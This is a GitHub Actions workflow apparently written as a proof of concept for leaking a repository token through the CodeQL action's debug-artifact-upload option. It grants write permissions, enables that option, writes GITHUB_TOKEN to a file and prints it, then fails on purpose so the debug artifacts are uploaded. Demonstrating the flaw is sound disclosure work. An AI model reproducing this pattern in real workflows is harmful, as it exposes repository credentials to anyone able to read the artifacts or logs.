name: Exploit-CodeQL-Leak
on:
  push:
    branches: [ main ]

jobs:
  codeql-debug-poc:
    name: CodeQL Token Leak PoC
    runs-on: ubuntu-latest
    permissions:
      actions: write
      contents: write
      security-events: write

    env:
      # Simulate a sensitive PAT or GITHUB_TOKEN
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Initialize CodeQL with Debug Artifact Upload
        uses: github/codeql-action/init@v3.28.2
        with:
          languages: javascript
          debug-artifact-upload: true  # ⚠️ Vulnerable behavior

      - name: Echo GITHUB_TOKEN (simulate secret misuse)
        run: |
          echo "TOKEN=$GITHUB_TOKEN" > token.txt
          cat token.txt

      - name: Intentional Fail to Trigger Debug Artifact
        run: |
          echo "Forcing failure to upload debug artifacts"
          exit 1
